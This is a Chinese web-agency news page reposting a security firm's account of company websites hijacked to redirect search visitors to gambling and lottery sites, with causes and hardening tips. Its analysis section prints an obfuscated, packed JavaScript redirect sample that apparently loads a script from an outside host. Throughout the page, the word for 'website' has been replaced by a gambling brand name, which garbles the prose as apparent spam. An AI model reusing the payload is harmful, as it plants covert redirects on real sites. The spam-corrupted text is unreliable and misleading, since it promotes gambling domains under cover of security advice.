新闻观点
  • 观点/分享
  • 新闻资讯
  • 建站知识
  • 运营技巧
  • 常见问题
  • 签约动态
  • 技术分享
  • 公司永丰棋牌永丰国际被跳转到彩票、赌博永丰棋牌永丰国际怎么处理?

    2018-08-03 作者:渠道科技 | 关注度:250 | 来源: www.02308.com
    最近一段时间,我们SINE安全公司一连接到数十个公司永丰棋牌永丰国际被跳转到彩票,博彩永丰棋牌永丰国际上去,客户反映从百度搜索永丰棋牌永丰国际进去,直接跳转到彩票永丰棋牌永丰国际上,直接输入网址没有跳转,导致客户永丰棋牌永丰国际的流量急剧下滑,做的百度推广跟搜狗推广,都给彩票永丰棋牌永丰国际做广告了,公司领导高度重视永丰棋牌永丰国际安全的问题,因为给公司的形象以及名誉带来的损失太大了,我们安排安全技术人员对其永丰棋牌永丰国际进行全面的永丰棋牌永丰国际安全检测,对永丰棋牌永丰国际存在的漏洞,以及木马后门进行全面的清除与漏洞修复,安全加固。关于永丰棋牌永丰国际被跳转到彩票、博彩永丰棋牌永丰国际的问题,整理一份详细的处理过程,希望帮到更多遇到这种情况的站长,以及公司永丰棋牌永丰国际运营者。

      永丰棋牌永丰国际被跳转彩票永丰棋牌永丰国际问题分析

      我们SINE安全跟公司永丰棋牌永丰国际负责人进行了详细的服务器信息(服务器IP 远程端口 管理员账号密码、SSH端口、root账号密码),永丰棋牌永丰国际信息包括FTP账号密码的对接,由安全部署部门技术对永丰棋牌永丰国际的代码以及服务器系统进行缜密的安全检测与分析。


      在整体的安全检测当中我们发现客户的永丰棋牌永丰国际都存在永丰棋牌永丰国际木马后门,包括php脚本木马,asp脚本木马,jsp脚本木马,我们通常叫大马,可以对永丰棋牌永丰国际进行恶意篡改,上传,改名,下载,等管理员的高权限操作。出现永丰棋牌永丰国际被跳转的客户,采用的永丰棋牌永丰国际架构都是php+mysql架构,以及jsp+mysql架构,大多数用的是开源程序,像dedecms,织梦系统,phpcms系统,discuz系统。

      由于之前客户永丰棋牌永丰国际总是被跳转到彩票、赌博永丰棋牌永丰国际,客户只是懂一些简单的代码,只能通过篡改的首页代码里,找到恶意代码进行删除,但是治标不治本,没过几天永丰棋牌永丰国际又被跳转了,客户经常为这些问题烦恼,每天提心吊胆的。其实问题的根本原因在于永丰棋牌永丰国际存在漏洞,以及服务器安全没有做好。我们SINE处理了成千上百的永丰棋牌永丰国际,总结的经验来看,永丰棋牌永丰国际首页被篡改的几率最大,都是篡改首页的标题,描述,以及在首页顶部添加一些加密的字符,如下图所示:


      北京赛车投注平台_北京赛车pk10网上开户_北京赛车pk10登录平台

      以上代码就是被攻击者添加的加密的标题与描述,解密后发现内容是什么北京赛车,时时彩,PK10等赌博内容。还有一个被攻击的特征就是在首页你会发现一段跳转的代码,该代码是根据搜索引擎的特征来进行判断跳转,比如判断客户的访问来路是通过百度搜索,360搜索,搜狗搜索来的会直接跳转到彩票,赌博永丰棋牌永丰国际上去。如下代码:

      type="text/java">eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){retun d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('l["\\e\\c\\1\\m\\i\\8\\n\\0"]["\\7\\4\\9\\0\\8"](\'\\h\\2\\1\\4\\9\\3\\0\\0\\j\\3\\8\\d\\6\\0\\8\\k\\0\\5\\f\\a\\r\\a\\2\\1\\4\\9\\3\\0\\6\\2\\4\\1\\d\\6\\s\\0\\0\\3\\2\\q\\5\\5\\7\\7\\7\\b\\1\\3\\e\\a\\2\\p\\b\\1\\c\\i\\5\\j\\o\\1\\b\\f\\2\\6\\g\\h\\5\\2\\1\\4\\9\\3\\0\\g\');',29,29,'x74|x63|x73|x70|x72|x2f|x22|x77|x65|x69|x61|x2e|x6f|x3d|x64|x6a|x3e|x3c|x6d|x79|x78|window|x75|x6e|x6c|x38|x3a|x76|x68'.split('|'),0,{}))

      跳转到的彩票永丰棋牌永丰国际如下截图:


      再一个攻击特征就是永丰棋牌永丰国际在百度里搜索,出现红色风险标识, 百度网址安全中心提醒您:该站点可能受到黑客攻击,部分页面已被非法篡改! 红色提示该百度风险。导致客户打开永丰棋牌永丰国际直接被百度拦截,如下图所示:


      百度网址安全中心提醒您:

      该站点可能受到黑客攻击,部分页面已被非法篡改! 查看详情

      您正在访问:http*******com/

      该站点可能由于受到黑客攻击,部分页面已被非法篡改,可能会威胁到您的财产和信息安全,建议您谨慎访问。

      站点(******.com/)发现的非法篡改页面,可参考以下示例:

      被黑网址快照1:********com/011E...

      被黑网址快照2:********com/010S...

      被黑网址快照3:********com/004G...

      针对以上永丰棋牌永丰国际被跳转攻击的特征,我们SINE对其进行全面的人工代码安全审计,以及永丰棋牌永丰国际漏洞检测,永丰棋牌永丰国际木马后门清理,发现dedecms永丰棋牌永丰国际存在sql注入漏洞,以及xss获取管理员账号cookies漏洞,discuz存在getshell漏洞,注入获取管理员漏洞,discuz上传绕过漏洞,针对上述漏洞我们进行了全面的修复,并做了永丰棋牌永丰国际安全部署,以及服务器安全部署,永丰棋牌永丰国际文件防篡改部署。

      防止永丰棋牌永丰国际被跳转的解决方法如下:

      1.对服务器目录权限的安全部署,对管理员账号密码加密,尽可能设置的复杂一些,数字+大小写字母+特殊符号,对永丰棋牌永丰国际数据库进行分配普通权限账号。

      2.mysql数据库默认端口3306,改为61116,并加入到端口安全策略,不对外开放,外网IP无法连接数据库,只有本地127.0.0.1才能进行连接数据库,以防止攻击者恶意猜测。

      3.对服务器底层系统进行安全加固,包括远程端口登录的安全验证。

      4.对永丰棋牌永丰国际代码进行整体的安全检测,包括定期的升级永丰棋牌永丰国际程序源代码,修复补丁以及永丰棋牌永丰国际漏洞。

    首页 | 永丰棋牌永丰国际建设 | 经典案例 | 新闻观点 | 服务范围 | 合作客户 | 关于我们